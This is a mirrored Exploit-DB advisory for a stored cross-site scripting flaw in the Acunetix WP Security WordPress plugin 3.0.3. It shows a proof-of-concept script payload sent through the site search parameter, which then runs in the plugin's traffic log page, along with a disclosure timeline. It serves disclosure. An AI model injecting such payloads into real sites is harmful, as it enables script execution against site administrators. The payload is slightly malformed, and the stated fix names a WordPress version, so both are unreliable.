bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/39761.txt
Offensive Security 5a82bad23d DB: 2016-05-05 
14 new exploits

Alibaba Clone B2B Script - Admin Authentication Bypass
CMS Made Simple < 2.1.3 & < 1.12.1 - Web Server Cache Poisoning
Acunetix WP Security Plugin 3.0.3 - XSS
NetCommWireless HSPA 3G10WVE Wireless Router – Multiple Vulnerabilities
TRN Threaded USENET News Reader 3.6-23 - Local Stack-Based Overflow
IPFire < 2.19 Core Update 101 - Remote Command Execution
PHP Imagick 3.3.0 - disable_functions Bypass
ImageMagick < 6.9.3-9 - Multiple Vulnerabilities
OpenSSL Padding Oracle in AES-NI CBC MAC Check
Zabbix Agent 3.0.1 - mysql.size Shell Command Injection
McAfee LiveSafe 14.0 - Relocations Processing Memory Corruption
Linux (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (/etc/shadow)
Linux Kernel 4.4.x (Ubuntu 16.04) - Use-After-Free via double-fdput() in bpf(BPF_PROG_LOAD) Error Path Local Root Exploit
Linux (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps
2016-05-05 05:04:38 +00:00

38 lines
1 KiB
Text
Executable file
Raw Blame History

1. Introduction
# Exploit Title: Acunetix WP Security 3.0.3 XSS
# Date: May.03.2016
# Exploit Author: Johto Robbie
# Facebook: https://www.facebook.com/johto.robbie
# Vendor: VN Hacker News
# Tested On: Apache 2.4.17 / PHP 5.6.16 / Windows 10 / WordPress 4.5.1
# Category: Webapps
# Software Link:
http://localhost:8888/wordpress/wp-admin/admin.php?page=swpa_live_traffic
2. Descryption:
I have to insert scripts into the content search wordpress. The result is
that it is logging in Acunetix Secure WordPress. Taking advantage of this,
I have exploited XSS vulnerability
<span class="w-entry"><a
href="http://localhost:8888/wordpress/?s="><script>alert("Johto.Robbie"</script>"
target="_blank" title="Opens in a new tab">
http://localhost:8888/wordpress/?s=
"><script>alert("Johto.Robbie"</script></a></span>
Video Demonstration:
https://www.youtube.com/watch?v=L8t3_HGriP8&feature=youtu.be
3. Report Timeline
02-05-2016 : Discovered
02-05-2016 : Vendor notified
4. Solution
Update to version 4.5.1
Reference in a new issue View git blame Copy permalink